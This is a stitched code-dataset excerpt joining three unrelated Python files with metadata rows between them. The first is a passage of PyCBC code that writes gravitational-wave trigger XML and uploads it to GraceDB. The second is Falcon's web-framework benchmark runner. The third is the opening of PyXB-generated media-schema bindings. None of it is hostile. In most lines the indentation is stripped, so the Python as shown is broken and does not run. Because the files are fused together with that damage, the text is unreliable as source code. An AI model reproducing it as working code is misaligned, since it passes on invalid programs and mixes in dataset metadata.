self.is_hardware_injection = ('HWINJ' in coinc_results)
# remember if we want to use a non-standard gracedb server
self.gracedb_server = kwargs.get('gracedb_server')
# compute SNR time series if needed, and figure out which of
# the followup detectors are usable
subthreshold_sngl_time = numpy.mean(
[coinc_results['foreground/%s/end_time' % ifo]
for ifo in ifos])
self.upload_snr_series = kwargs.get('upload_snr_series')
usable_ifos = []
if self.upload_snr_series:
self.snr_series = {}
self.snr_series_psd = {}
htilde = kwargs['bank'][self.template_id]
for ifo in ifos + followup_ifos:
if ifo in ifos:
trig_time = coinc_results['foreground/%s/end_time' % ifo]
else:
trig_time = subthreshold_sngl_time
# NOTE we only check the state/DQ of followup IFOs here.
# IFOs producing the coincidence are assumed to also
# produce valid SNR series.
snr_series, snr_series_psd = compute_followup_snr_series(
kwargs['data_readers'][ifo], htilde, trig_time,
check_state=(ifo in followup_ifos))
if snr_series is not None:
self.snr_series[ifo] = snr_series
self.snr_series_psd[ifo] = snr_series_psd
usable_ifos.append(ifo)
else:
usable_ifos = ifos
# Set up the bare structure of the xml document
outdoc = ligolw.Document()
outdoc.appendChild(ligolw.LIGO_LW())
proc_id = ligolw_process.register_to_xmldoc(
outdoc, 'pycbc', {}, ifos=usable_ifos, comment='',
version=pycbc_version.git_hash,
cvs_repository='pycbc/'+pycbc_version.git_branch,
cvs_entry_time=pycbc_version.date).process_id
# Set up coinc_definer table
coinc_def_table = lsctables.New(lsctables.CoincDefTable)
coinc_def_id = lsctables.CoincDefID(0)
coinc_def_row = lsctables.CoincDef()
coinc_def_row.search = "inspiral"
coinc_def_row.description = "sngl_inspiral<-->sngl_inspiral coincs"
coinc_def_row.coinc_def_id = coinc_def_id
coinc_def_row.search_coinc_type = 0
coinc_def_table.append(coinc_def_row)
outdoc.childNodes[0].appendChild(coinc_def_table)
# Set up coinc inspiral and coinc event tables
coinc_id = lsctables.CoincID(0)
coinc_event_table = lsctables.New(lsctables.CoincTable)
coinc_event_row = lsctables.Coinc()
coinc_event_row.coinc_def_id = coinc_def_id
coinc_event_row.nevents = len(usable_ifos)
coinc_event_row.instruments = ','.join(usable_ifos)
coinc_event_row.time_slide_id = lsctables.TimeSlideID(0)
coinc_event_row.process_id = proc_id
coinc_event_row.coinc_event_id = coinc_id
coinc_event_row.likelihood = 0.
coinc_event_table.append(coinc_event_row)
outdoc.childNodes[0].appendChild(coinc_event_table)
# Set up sngls
sngl_inspiral_table = lsctables.New(lsctables.SnglInspiralTable)
coinc_event_map_table = lsctables.New(lsctables.CoincMapTable)
sngl_populated = None
for sngl_id, ifo in enumerate(usable_ifos):
sngl = return_empty_sngl(nones=True)
sngl.event_id = lsctables.SnglInspiralID(sngl_id)
sngl.process_id = proc_id
sngl.ifo = ifo
names = [n.split('/')[-1] for n in coinc_results
if 'foreground/%s' % ifo in n]
for name in names:
val = coinc_results['foreground/%s/%s' % (ifo, name)]
if name == 'end_time':
sngl.set_end(lal.LIGOTimeGPS(val))
else:
try:
setattr(sngl, name, val)
except AttributeError:
pass
if sngl.mass1 and sngl.mass2:
sngl.mtotal, sngl.eta = pnutils.mass1_mass2_to_mtotal_eta(
sngl.mass1, sngl.mass2)
sngl.mchirp, _ = pnutils.mass1_mass2_to_mchirp_eta(
sngl.mass1, sngl.mass2)
sngl_populated = sngl
if sngl.snr:
sngl.eff_distance = (sngl.sigmasq)**0.5 / sngl.snr
sngl_inspiral_table.append(sngl)
# Set up coinc_map entry
coinc_map_row = lsctables.CoincMap()
coinc_map_row.table_name = 'sngl_inspiral'
coinc_map_row.coinc_event_id = coinc_id
coinc_map_row.event_id = sngl.event_id
coinc_event_map_table.append(coinc_map_row)
if self.upload_snr_series:
snr_series_to_xml(self.snr_series[ifo], outdoc, sngl.event_id)
# for subthreshold detectors, respect BAYESTAR's assumptions and checks
bayestar_check_fields = ('mass1 mass2 mtotal mchirp eta spin1x '
'spin1y spin1z spin2x spin2y spin2z').split()
for sngl in sngl_inspiral_table:
if sngl.ifo in followup_ifos:
for bcf in bayestar_check_fields:
setattr(sngl, bcf, getattr(sngl_populated, bcf))
sngl.set_end(lal.LIGOTimeGPS(subthreshold_sngl_time))
outdoc.childNodes[0].appendChild(coinc_event_map_table)
outdoc.childNodes[0].appendChild(sngl_inspiral_table)
# Set up the coinc inspiral table
coinc_inspiral_table = lsctables.New(lsctables.CoincInspiralTable)
coinc_inspiral_row = lsctables.CoincInspiral()
# This seems to be used as FAP, which should not be in gracedb
coinc_inspiral_row.false_alarm_rate = 0
coinc_inspiral_row.minimum_duration = 0.
coinc_inspiral_row.set_ifos(usable_ifos)
coinc_inspiral_row.coinc_event_id = coinc_id
coinc_inspiral_row.mchirp = sngl_populated.mchirp
coinc_inspiral_row.mass = sngl_populated.mtotal
coinc_inspiral_row.end_time = sngl_populated.end_time
coinc_inspiral_row.end_time_ns = sngl_populated.end_time_ns
coinc_inspiral_row.snr = coinc_results['foreground/stat']
far = 1.0 / (lal.YRJUL_SI * coinc_results['foreground/ifar'])
coinc_inspiral_row.combined_far = far
coinc_inspiral_table.append(coinc_inspiral_row)
outdoc.childNodes[0].appendChild(coinc_inspiral_table)
self.outdoc = outdoc
self.time = sngl_populated.get_end()
def save(self, filename):
"""Write this trigger to gracedb compatible xml format
Parameters
----------
filename: str
Name of file to write to disk.
"""
ligolw_utils.write_filename(self.outdoc, filename)
def upload(self, fname, psds, low_frequency_cutoff,
testing=True,
extra_strings=None,
):
"""Upload this trigger to gracedb
Parameters
----------
fname: str
The name to give the xml file associated with this trigger
        psds: dict of pycbc.types.FrequencySeries
            An ifo-keyed dictionary of psds to be uploaded in association
with this trigger.
low_frequency_cutoff: float
The low frequency cutoff of the psds.
testing: bool
Switch to determine if the upload should be sent to gracedb as a
test trigger (True) or a production trigger (False)
"""
from ligo.gracedb.rest import GraceDb
# first of all, make sure the event and PSDs are saved on disk
# as GraceDB operations can fail later
self.save(fname)
psds_lal = {}
for ifo in psds:
psd = psds[ifo]
kmin = int(low_frequency_cutoff / psd.delta_f)
fseries = lal.CreateREAL8FrequencySeries(
"psd", psd.epoch, low_frequency_cutoff, psd.delta_f,
lal.StrainUnit**2 / lal.HertzUnit, len(psd) - kmin)
fseries.data.data = psd.numpy()[kmin:] / pycbc.DYN_RANGE_FAC ** 2.0
psds_lal[ifo] = fseries
psd_xmldoc = make_psd_xmldoc(psds_lal)
psd_xml_path = os.path.splitext(fname)[0] + '-psd.xml.gz'
ligolw_utils.write_filename(psd_xmldoc, psd_xml_path, gz=True)
if self.upload_snr_series:
snr_series_fname = os.path.splitext(fname)[0] + '.hdf'
for ifo in self.snr_series:
self.snr_series[ifo].save(snr_series_fname,
group='%s/snr' % ifo)
self.snr_series_psd[ifo].save(snr_series_fname,
group='%s/psd' % ifo)
# try connecting to GraceDB
try:
gracedb = GraceDb(self.gracedb_server) \
if self.gracedb_server is not None else GraceDb()
except Exception as exc:
logging.error('Cannot connect to GraceDB')
logging.error(str(exc))
logging.error('Carrying on, but event %s will NOT be uploaded!', fname)
return None
# create GraceDB event
group = 'Test' if testing else 'CBC'
try:
r = gracedb.createEvent(group, "pycbc", fname, "AllSky").json()
except Exception as exc:
logging.error('Cannot create GraceDB event')
logging.error(str(exc))
logging.error('Carrying on, but event %s will NOT be uploaded!', fname)
return None
logging.info("Uploaded event %s", r["graceid"])
if self.is_hardware_injection:
try:
gracedb.writeLabel(r['graceid'], 'INJ')
except Exception as exc:
logging.error("Cannot tag event %s as an injection", r["graceid"])
logging.error(str(exc))
logging.info("Tagging event %s as an injection", r["graceid"])
# upload PSDs
try:
gracedb.writeLog(r["graceid"],
"PyCBC PSD estimate from the time of event",
"psd.xml.gz", open(psd_xml_path, "rb").read(),
"psd").json()
except Exception as exc:
logging.error("Cannot upload PSDs for event %s", r["graceid"])
logging.error(str(exc))
logging.info("Uploaded PSDs for event %s", r["graceid"])
# add other tags and comments
try:
gracedb.writeLog(r["graceid"],
"Using PyCBC code hash %s" % pycbc_version.git_hash).json()
extra_strings = [] if extra_strings is None else extra_strings
for text in extra_strings:
gracedb.writeLog(r["graceid"], text).json()
except Exception as exc:
logging.error("Cannot write comments for event %s", r["graceid"])
logging.error(str(exc))
# upload SNR series in HDF format
if self.upload_snr_series:
try:
gracedb.writeFile(r['graceid'], snr_series_fname)
except Exception as exc:
logging.error("Cannot upload HDF SNR series for event %s",
r["graceid"])
logging.error(str(exc))
return r['graceid']
class SingleForGraceDB(SingleCoincForGraceDB):
"""Create xml files and submit them to gracedb from PyCBC Live"""
def __init__(self, ifo, sngls_dict, hardware_injection=False, **kwds):
"""Initialize a ligolw xml representation of this single trigger for
upload to gracedb
Parameters
----------
ifo: str
The IFO that the trigger came from.
sngls_dict: dict
Dictionary of singles parameters. Must include template parameters
and both 'ifar' and 'stat' values.
"""
fake_coinc = {}
fake_coinc['foreground/stat'] = sngls_dict.pop('stat')
fake_coinc['foreground/ifar'] = sngls_dict.pop('ifar')
for key in sngls_dict:
fake_coinc['foreground/%s/%s' % (ifo, key)] = sngls_dict[key]
if hardware_injection:
fake_coinc['HWINJ'] = True
SingleCoincForGraceDB.__init__(self, [ifo], fake_coinc, **kwds)
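# Minimal usage sketch (illustrative; `results` must hold the
# 'foreground/...' keys described above and `psds`/`low_frequency_cutoff`
# must match the analysis configuration):
#
#     coinc = SingleCoincForGraceDB(['H1', 'L1'], results)
#     coinc.save('event.xml')
#     gid = coinc.upload('event.xml', psds, 20.0, testing=True)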
| gpl-3.0 | 3,165,173,620,786,652,700 | 42.422764 | 95 | 0.592835 | false |
openilabs/falconlab | env/lib/python2.7/site-packages/falcon/bench/bench.py | 1 | 6616 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import argparse
from collections import defaultdict
import cProfile
from decimal import Decimal
import gc
import random
import sys
import timeit
try:
import guppy
except ImportError:
heapy = None
else:
heapy = guppy.hpy()
try:
import pprofile
except ImportError:
pprofile = None
from falcon.bench import create # NOQA
import falcon.testing as helpers
def bench(name, iterations, env, stat_memory):
func = create_bench(name, env)
gc.collect()
heap_diff = None
if heapy and stat_memory:
heap_before = heapy.heap()
total_sec = timeit.timeit(func, setup=gc.enable, number=iterations)
if heapy and stat_memory:
heap_diff = heapy.heap() - heap_before
sec_per_req = Decimal(total_sec) / Decimal(iterations)
sys.stdout.write('.')
sys.stdout.flush()
return (name, sec_per_req, heap_diff)
def profile(name, env, filename=None, verbose=False):
if filename:
filename = name + '-' + filename
print('Profiling %s ==> %s' % (name, filename))
else:
filename = None
title = name + ' profile'
print()
print('=' * len(title))
print(title)
print('=' * len(title))
func = create_bench(name, env)
gc.collect()
code = 'for x in xrange(10000): func()'
if verbose:
if pprofile is None:
print('pprofile not found. Please install pprofile and try again.')
return
pprofile.runctx(code, locals(), globals(), filename=filename)
else:
cProfile.runctx(code, locals(), globals(),
sort='tottime', filename=filename)
BODY = helpers.rand_string(10240, 10240) # NOQA
HEADERS = {'X-Test': 'Funky Chicken'} # NOQA
def create_bench(name, env):
srmock = helpers.StartResponseMock()
function = name.lower().replace('-', '_')
app = eval('create.{0}(BODY, HEADERS)'.format(function))
def bench():
app(env, srmock)
if srmock.status != '200 OK':
raise AssertionError(srmock.status + ' != 200 OK')
return bench
def consolidate_datasets(datasets):
results = defaultdict(list)
for dataset in datasets:
for name, sec_per_req, _ in dataset:
results[name].append(sec_per_req)
return [(name, min(vector)) for name, vector in results.items()]
def round_to_int(dec):
return int(dec.to_integral_value())
def avg(array):
return sum(array) / len(array)
def hello_env():
request_headers = {'Content-Type': 'application/json'}
return helpers.create_environ('/hello/584/test',
query_string='limit=10&thing=ab',
headers=request_headers)
def queues_env():
request_headers = {'Content-Type': 'application/json'}
path = ('/v1/852809/queues/0fd4c8c6-bd72-11e2-8e47-db5ebd4c8125'
'/claims/db5ebd4c8125')
qs = 'limit=10&thing=a%20b&x=%23%24'
return helpers.create_environ(path, query_string=qs,
headers=request_headers)
def get_env(framework):
return queues_env() if framework == 'falcon-ext' else hello_env()
def run(frameworks, trials, iterations, stat_memory):
# Skip any frameworks that are not installed
for name in frameworks:
try:
create_bench(name, hello_env())
except ImportError as ex:
print(ex)
print('Skipping missing library: ' + name)
del frameworks[frameworks.index(name)]
print()
if not frameworks:
print('Nothing to do.\n')
return
datasets = []
for r in range(trials):
random.shuffle(frameworks)
sys.stdout.write('Benchmarking, Trial %d of %d' %
(r + 1, trials))
sys.stdout.flush()
dataset = [bench(framework, iterations,
get_env(framework), stat_memory)
for framework in frameworks]
datasets.append(dataset)
print('done.')
return datasets
def main():
frameworks = [
'bottle',
'falcon',
'falcon-ext',
'flask',
'pecan',
'werkzeug'
]
parser = argparse.ArgumentParser(description="Falcon benchmark runner")
parser.add_argument('-b', '--benchmark', type=str, action='append',
choices=frameworks, dest='frameworks', nargs='+')
parser.add_argument('-i', '--iterations', type=int, default=50000)
parser.add_argument('-t', '--trials', type=int, default=3)
parser.add_argument('-p', '--profile', type=str,
choices=['standard', 'verbose'])
parser.add_argument('-o', '--profile-output', type=str, default=None)
parser.add_argument('-m', '--stat-memory', action='store_true')
args = parser.parse_args()
if args.stat_memory and heapy is None:
print('WARNING: Guppy not installed; memory stats are unavailable.\n')
if args.frameworks:
frameworks = args.frameworks
# Normalize frameworks type
normalized_frameworks = []
for one_or_many in frameworks:
if isinstance(one_or_many, list):
normalized_frameworks.extend(one_or_many)
else:
normalized_frameworks.append(one_or_many)
frameworks = normalized_frameworks
# Profile?
if args.profile:
for name in frameworks:
profile(name, get_env(name),
filename=args.profile_output,
verbose=(args.profile == 'verbose'))
print()
return
# Otherwise, benchmark
datasets = run(frameworks, args.trials, args.iterations,
args.stat_memory)
dataset = consolidate_datasets(datasets)
dataset = sorted(dataset, key=lambda r: r[1])
baseline = dataset[-1][1]
print('\nResults:\n')
for i, (name, sec_per_req) in enumerate(dataset):
req_per_sec = round_to_int(Decimal(1) / sec_per_req)
us_per_req = (sec_per_req * Decimal(10 ** 6))
factor = round_to_int(baseline / sec_per_req)
print('{3}. {0:.<15s}{1:.>06,d} req/sec or {2: >3.2f} μs/req ({4}x)'.
format(name, req_per_sec, us_per_req, i + 1, factor))
if heapy and args.stat_memory:
print()
for name, _, heap_diff in datasets[0]:
title = 'Memory change induced by ' + name
print()
print('=' * len(title))
print(title)
print('=' * len(title))
print(heap_diff)
print()
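# Usage sketch (illustrative; the exact entry point name depends on how the
# package wires this module up as a console script): benchmark two frameworks
# over 3 trials of 10000 iterations each.
#
#   <bench-script> -b falcon flask -t 3 -i 10000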
| mit | 2,771,928,568,808,080,400 | 25.46 | 79 | 0.58715 | false |
npo-poms/pyapi | npoapi/xml/media.py | 1 | 640297 | # ./npoapi/xml/media.py
# -*- coding: utf-8 -*-
# PyXB bindings for NM:aaac8a39e00bcd1804b49bf5b5b8b83fb686b430
# Generated 2021-06-13 22:15:50.850058 by PyXB version 1.2.6 using Python 3.8.2.final.0
# Namespace urn:vpro:media:2009 [xmlns:media]
from __future__ import unicode_literals
import pyxb
import pyxb.binding
import pyxb.binding.saxer
import io
import pyxb.utils.utility
import pyxb.utils.domutils
import sys
import pyxb.utils.six as _six
# Unique identifier for bindings created at the same time
_GenerationUID = pyxb.utils.utility.UniqueIdentifier('urn:uuid:23e5b8be-cc84-11eb-bb79-823829a95c05')
# Version of PyXB used to generate the bindings
_PyXBVersion = '1.2.6'
# Generated bindings are not compatible across PyXB versions
if pyxb.__version__ != _PyXBVersion:
raise pyxb.PyXBVersionError(_PyXBVersion)
# A holder for module-level binding classes so we can access them from
# inside class definitions where property names may conflict.
_module_typeBindings = pyxb.utils.utility.Object()
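# For instance, later in this module each generated type is also registered on
# this holder (e.g. _module_typeBindings.mediaTypeEnum), so class bodies can
# reference sibling bindings without name clashes.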
# Import bindings for namespaces imported into schema
import pyxb.binding.datatypes
import pyxb.binding.xml_
import npoapi.xml.shared as _ImportedBinding_npoapi_xml_shared
# NOTE: All namespace declarations are reserved within the binding
Namespace = pyxb.namespace.NamespaceForURI('urn:vpro:media:2009', create_if_missing=True)
Namespace.configureCategories(['typeBinding', 'elementBinding'])
_Namespace_shared = _ImportedBinding_npoapi_xml_shared.Namespace
_Namespace_shared.configureCategories(['typeBinding', 'elementBinding'])
def CreateFromDocument (xml_text, default_namespace=None, location_base=None):
"""Parse the given XML and use the document element to create a
Python instance.
    @param xml_text An XML document. This should be data (Python 2
    str or Python 3 bytes), or text (Python 2 unicode or Python 3
    str) in the L{pyxb._InputEncoding} encoding.
@keyword default_namespace The L{pyxb.Namespace} instance to use as the
default namespace where there is no default namespace in scope.
If unspecified or C{None}, the namespace of the module containing
this function will be used.
@keyword location_base: An object to be recorded as the base of all
L{pyxb.utils.utility.Location} instances associated with events and
objects handled by the parser. You might pass the URI from which
the document was obtained.
"""
if pyxb.XMLStyle_saxer != pyxb._XMLStyle:
dom = pyxb.utils.domutils.StringToDOM(xml_text)
return CreateFromDOM(dom.documentElement, default_namespace=default_namespace)
if default_namespace is None:
default_namespace = Namespace.fallbackNamespace()
saxer = pyxb.binding.saxer.make_parser(fallback_namespace=default_namespace, location_base=location_base)
handler = saxer.getContentHandler()
xmld = xml_text
if isinstance(xmld, _six.text_type):
xmld = xmld.encode(pyxb._InputEncoding)
saxer.parse(io.BytesIO(xmld))
instance = handler.rootObject()
return instance
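# Usage sketch (an illustrative addition, not generated by PyXB; the file name
# is hypothetical): parse a document conforming to the urn:vpro:media:2009
# schema into a binding instance.
#
#   with open('media-document.xml', 'rb') as f:
#       instance = CreateFromDocument(f.read())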
def CreateFromDOM (node, default_namespace=None):
"""Create a Python instance from the given DOM node.
The node tag must correspond to an element declaration in this module.
    @deprecated: Forcing use of the DOM interface is unnecessary; use L{CreateFromDocument}."""
if default_namespace is None:
default_namespace = Namespace.fallbackNamespace()
return pyxb.binding.basis.element.AnyCreateFromDOM(node, default_namespace)
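# Usage sketch (illustrative; the DOM route is deprecated in favour of
# CreateFromDocument, and the file name is hypothetical):
#
#   import xml.dom.minidom
#   dom = xml.dom.minidom.parse('media-document.xml')
#   instance = CreateFromDOM(dom.documentElement)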
# Atomic simple type: {urn:vpro:media:2009}mediaTypeEnum
class mediaTypeEnum (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'mediaTypeEnum')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 118, 2)
_Documentation = None
mediaTypeEnum._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=mediaTypeEnum, enum_prefix=None)
mediaTypeEnum.MEDIA = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='MEDIA', tag='MEDIA')
mediaTypeEnum.GROUP = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='GROUP', tag='GROUP')
mediaTypeEnum.PROGRAM = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='PROGRAM', tag='PROGRAM')
mediaTypeEnum.SEGMENTTYPE = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='SEGMENTTYPE', tag='SEGMENTTYPE')
mediaTypeEnum.STRAND = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='STRAND', tag='STRAND')
mediaTypeEnum.ALBUM = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='ALBUM', tag='ALBUM')
mediaTypeEnum.PLAYLIST = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='PLAYLIST', tag='PLAYLIST')
mediaTypeEnum.ARCHIVE = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='ARCHIVE', tag='ARCHIVE')
mediaTypeEnum.SEASON = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='SEASON', tag='SEASON')
mediaTypeEnum.SERIES = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='SERIES', tag='SERIES')
mediaTypeEnum.UMBRELLA = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='UMBRELLA', tag='UMBRELLA')
mediaTypeEnum.BROADCAST = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='BROADCAST', tag='BROADCAST')
mediaTypeEnum.MOVIE = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='MOVIE', tag='MOVIE')
mediaTypeEnum.TRAILER = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='TRAILER', tag='TRAILER')
mediaTypeEnum.CLIP = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='CLIP', tag='CLIP')
mediaTypeEnum.TRACK = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='TRACK', tag='TRACK')
mediaTypeEnum.SEGMENT = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='SEGMENT', tag='SEGMENT')
mediaTypeEnum.VISUALRADIO = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='VISUALRADIO', tag='VISUALRADIO')
mediaTypeEnum.VISUALRADIOSEGMENT = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='VISUALRADIOSEGMENT', tag='VISUALRADIOSEGMENT')
mediaTypeEnum.PROMO = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='PROMO', tag='PROMO')
mediaTypeEnum.RECORDING = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='RECORDING', tag='RECORDING')
mediaTypeEnum.COLLECTION = mediaTypeEnum._CF_enumeration.addEnumeration(unicode_value='COLLECTION', tag='COLLECTION')
mediaTypeEnum._InitializeFacetMap(mediaTypeEnum._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'mediaTypeEnum', mediaTypeEnum)
_module_typeBindings.mediaTypeEnum = mediaTypeEnum
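# Usage sketch (illustrative): enumeration constants are exposed as class
# attributes holding typed string values, so comparisons against the plain
# enumeration string work as expected, e.g.
#
#   mediaTypeEnum.BROADCAST == 'BROADCAST'   # True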
# Atomic simple type: {urn:vpro:media:2009}groupTypeEnum
class groupTypeEnum (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'groupTypeEnum')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 173, 2)
_Documentation = None
groupTypeEnum._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=groupTypeEnum, enum_prefix=None)
groupTypeEnum.STRAND = groupTypeEnum._CF_enumeration.addEnumeration(unicode_value='STRAND', tag='STRAND')
groupTypeEnum.ALBUM = groupTypeEnum._CF_enumeration.addEnumeration(unicode_value='ALBUM', tag='ALBUM')
groupTypeEnum.PLAYLIST = groupTypeEnum._CF_enumeration.addEnumeration(unicode_value='PLAYLIST', tag='PLAYLIST')
groupTypeEnum.ARCHIVE = groupTypeEnum._CF_enumeration.addEnumeration(unicode_value='ARCHIVE', tag='ARCHIVE')
groupTypeEnum.COLLECTION = groupTypeEnum._CF_enumeration.addEnumeration(unicode_value='COLLECTION', tag='COLLECTION')
groupTypeEnum.SEASON = groupTypeEnum._CF_enumeration.addEnumeration(unicode_value='SEASON', tag='SEASON')
groupTypeEnum.SERIES = groupTypeEnum._CF_enumeration.addEnumeration(unicode_value='SERIES', tag='SERIES')
groupTypeEnum.UMBRELLA = groupTypeEnum._CF_enumeration.addEnumeration(unicode_value='UMBRELLA', tag='UMBRELLA')
groupTypeEnum._InitializeFacetMap(groupTypeEnum._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'groupTypeEnum', groupTypeEnum)
_module_typeBindings.groupTypeEnum = groupTypeEnum
# Atomic simple type: {urn:vpro:media:2009}programTypeEnum
class programTypeEnum (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'programTypeEnum')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 186, 2)
_Documentation = None
programTypeEnum._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=programTypeEnum, enum_prefix=None)
programTypeEnum.BROADCAST = programTypeEnum._CF_enumeration.addEnumeration(unicode_value='BROADCAST', tag='BROADCAST')
programTypeEnum.MOVIE = programTypeEnum._CF_enumeration.addEnumeration(unicode_value='MOVIE', tag='MOVIE')
programTypeEnum.TRAILER = programTypeEnum._CF_enumeration.addEnumeration(unicode_value='TRAILER', tag='TRAILER')
programTypeEnum.CLIP = programTypeEnum._CF_enumeration.addEnumeration(unicode_value='CLIP', tag='CLIP')
programTypeEnum.STRAND = programTypeEnum._CF_enumeration.addEnumeration(unicode_value='STRAND', tag='STRAND')
programTypeEnum.TRACK = programTypeEnum._CF_enumeration.addEnumeration(unicode_value='TRACK', tag='TRACK')
programTypeEnum.VISUALRADIO = programTypeEnum._CF_enumeration.addEnumeration(unicode_value='VISUALRADIO', tag='VISUALRADIO')
programTypeEnum.PROMO = programTypeEnum._CF_enumeration.addEnumeration(unicode_value='PROMO', tag='PROMO')
programTypeEnum.RECORDING = programTypeEnum._CF_enumeration.addEnumeration(unicode_value='RECORDING', tag='RECORDING')
programTypeEnum._InitializeFacetMap(programTypeEnum._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'programTypeEnum', programTypeEnum)
_module_typeBindings.programTypeEnum = programTypeEnum
# Atomic simple type: {urn:vpro:media:2009}segmentTypeEnum
class segmentTypeEnum (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'segmentTypeEnum')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 200, 2)
_Documentation = None
segmentTypeEnum._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=segmentTypeEnum, enum_prefix=None)
segmentTypeEnum.SEGMENT = segmentTypeEnum._CF_enumeration.addEnumeration(unicode_value='SEGMENT', tag='SEGMENT')
segmentTypeEnum.VISUALRADIOSEGMENT = segmentTypeEnum._CF_enumeration.addEnumeration(unicode_value='VISUALRADIOSEGMENT', tag='VISUALRADIOSEGMENT')
segmentTypeEnum._InitializeFacetMap(segmentTypeEnum._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'segmentTypeEnum', segmentTypeEnum)
_module_typeBindings.segmentTypeEnum = segmentTypeEnum
# Atomic simple type: {urn:vpro:media:2009}workflowTypeEnum
class workflowTypeEnum (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'workflowTypeEnum')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 207, 2)
_Documentation = None
workflowTypeEnum._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=workflowTypeEnum, enum_prefix=None)
workflowTypeEnum.PUBLISHED = workflowTypeEnum._CF_enumeration.addEnumeration(unicode_value='PUBLISHED', tag='PUBLISHED')
workflowTypeEnum.REVOKED = workflowTypeEnum._CF_enumeration.addEnumeration(unicode_value='REVOKED', tag='REVOKED')
workflowTypeEnum.FOR_REPUBLICATION = workflowTypeEnum._CF_enumeration.addEnumeration(unicode_value='FOR REPUBLICATION', tag='FOR_REPUBLICATION')
workflowTypeEnum.FOR_PUBLICATION = workflowTypeEnum._CF_enumeration.addEnumeration(unicode_value='FOR PUBLICATION', tag='FOR_PUBLICATION')
workflowTypeEnum.DELETED = workflowTypeEnum._CF_enumeration.addEnumeration(unicode_value='DELETED', tag='DELETED')
workflowTypeEnum.PARENT_REVOKED = workflowTypeEnum._CF_enumeration.addEnumeration(unicode_value='PARENT REVOKED', tag='PARENT_REVOKED')
workflowTypeEnum._InitializeFacetMap(workflowTypeEnum._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'workflowTypeEnum', workflowTypeEnum)
_module_typeBindings.workflowTypeEnum = workflowTypeEnum
# Atomic simple type: {urn:vpro:media:2009}cridType
class cridType (pyxb.binding.datatypes.anyURI):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'cridType')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 349, 2)
_Documentation = None
cridType._CF_pattern = pyxb.binding.facets.CF_pattern()
cridType._CF_pattern.addPattern(pattern='(c|C)(r|R)(i|I)(d|D)://.*/.*')
cridType._InitializeFacetMap(cridType._CF_pattern)
Namespace.addCategoryObject('typeBinding', 'cridType', cridType)
_module_typeBindings.cridType = cridType
# Atomic simple type: {urn:vpro:media:2009}platformTypeEnum
class platformTypeEnum (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An atomic simple type."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'platformTypeEnum')
_XSDLocation = pyxb.utils.utility.Location('https://poms-dev.omroep.nl/schema/vproMedia.xsd', 355, 2)
_Documentation = None
platformTypeEnum._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=platformTypeEnum, enum_prefix=None)
platformTypeEnum.INTERNETVOD = platformTypeEnum._CF_enumeration.addEnumeration(unicode_value='INTERNETVOD', tag='INTERNETVOD')
platformTypeEnum.TVVOD = platformTypeEnum._CF_enumeration.addEnumeration(unicode_value='TVVOD', tag='TVVOD')
platformTypeEnum.PLUSVOD = platformTypeEnum._CF_enumeration.addEnumeration(unicode_value='PLUSVOD', tag='PLUSVOD')
platformTypeEnum.NPOPLUSVOD = platformTypeEnum._CF_enumeration.addEnumeration(unicode_value='NPOPLUSVOD', tag='NPOPLUSVOD')
platformTypeEnum._InitializeFacetMap(platformTypeEnum._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'platformTypeEnum', platformTypeEnum)
